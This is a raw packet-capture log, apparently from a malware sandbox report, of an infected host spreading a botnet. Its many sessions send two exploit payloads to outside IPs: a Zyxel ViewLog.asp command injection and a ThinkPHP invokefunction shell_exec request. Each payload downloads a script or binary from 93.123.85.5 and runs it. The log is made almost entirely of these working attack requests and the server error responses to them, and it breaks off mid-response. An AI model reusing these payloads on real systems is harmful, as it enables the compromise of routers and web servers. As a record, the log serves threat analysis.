                                                              Nov 13, 2023 22:20:47.316401005 CET20626OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:47.626142025 CET20633INHTTP/1.1 405 Not Allowed
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:47 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 150
                                                              Connection: keep-alive
                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Permitted-Cross-Domain-Policies: none
                                                              X-Robots-Tag: none
                                                              Referrer-Policy: no-referrer
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1047192.168.2.235955094.121.145.718080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:47.369764090 CET20628OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1048192.168.2.235250662.29.70.58080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:47.376579046 CET20629OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1049192.168.2.234296694.70.115.2438080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:47.382514954 CET20629OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              105192.168.2.2333236112.165.103.21180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.473196983 CET3074OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:24.776340961 CET3145INHTTP/1.1 400 Bad Request
                                                              Connection: close
                                                              Content-Length: 48
                                                              Content-Type: application/json
                                                              Strict-Transport-Security:
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              106192.168.2.235356494.121.25.28080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.489960909 CET3079OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              107192.168.2.235978085.75.45.328080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.491549969 CET3079OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              108192.168.2.234545085.99.226.2188080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.522820950 CET3081OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              10994.103.207.458080192.168.2.2356144
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.775651932 CET3144INHTTP/1.0 400 Bad Request
                                                              Server: httpd/2.0
                                                              Date: Mon, 13 Nov 2023 21:18:20 GMT
                                                              Content-Type: text/html
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              11192.168.2.234743894.120.253.948080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:01.381119013 CET436OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              110192.168.2.2357078112.216.8.25180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.781533003 CET3155OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:25.098043919 CET3195INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.24.0
                                                              Date: Mon, 13 Nov 2023 21:18:24 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 157
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              111192.168.2.235084095.100.244.6080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:25.389019012 CET3201OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:25.673675060 CET3206INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:18:25 GMT
                                                              Date: Mon, 13 Nov 2023 21:18:25 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 31 61 37 62 35 63 26 23 34 36 3b 31 36 39 39 39 31 30 33 30 35 26 23 34 36 3b 31 35 34 35 32 34 32 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;c1a7b5c&#46;1699910305&#46;1545242e</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              112192.168.2.233355895.101.58.22180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:25.396249056 CET3202OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:25.692610025 CET3206INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:18:25 GMT
                                                              Date: Mon, 13 Nov 2023 21:18:25 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 36 35 61 33 33 62 38 26 23 34 36 3b 31 36 39 39 39 31 30 33 30 35 26 23 34 36 3b 37 62 37 30 61 31 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;965a33b8&#46;1699910305&#46;7b70a1a</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              113192.168.2.234418895.216.193.15880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:25.413779020 CET3203OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:25.723649979 CET3218INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Mon, 13 Nov 2023 21:18:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 182
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              114192.168.2.233502495.95.253.5380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:25.427822113 CET3203OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:25.750869989 CET3219INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:18:25 GMT
                                                              Date: Mon, 13 Nov 2023 21:18:25 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 35 66 64 35 66 35 66 26 23 34 36 3b 31 36 39 39 39 31 30 33 30 35 26 23 34 36 3b 31 30 38 34 62 35 39 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;35fd5f5f&#46;1699910305&#46;1084b59f</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              115192.168.2.233487895.65.89.13280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:25.720587969 CET3217OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:26.052568913 CET3317INHTTP/1.1 505 HTTP Version not supported
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 140
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              116192.168.2.233701462.238.239.1048080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:25.891745090 CET3289OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              117192.168.2.233480895.216.161.908080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:25.891853094 CET3290OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:26.368360996 CET3326INHTTP/1.1 404 Not Found
                                                              Date: Mon, 13 Nov 2023 21:18:26 GMT
                                                              Server: Apache/2.4.54 (Debian)
                                                              X-Powered-By: PHP/8.0.28
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              Link: <https://twatzl.photography/wp-json/>; rel="https://api.w.org/"
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Transfer-Encoding: chunked
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 33 65 64 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 30 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 74 77 61 74 7a 6c 20 50 68 6f 74 6f 67 72 61 70 68 79 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 74 77 61 74 7a 6c 20 50 68 6f 74 6f 67 72 61 70 68 79 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 77 61 74 7a 6c 20 50 68 6f 74 6f 67 72 61 70 68 79 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 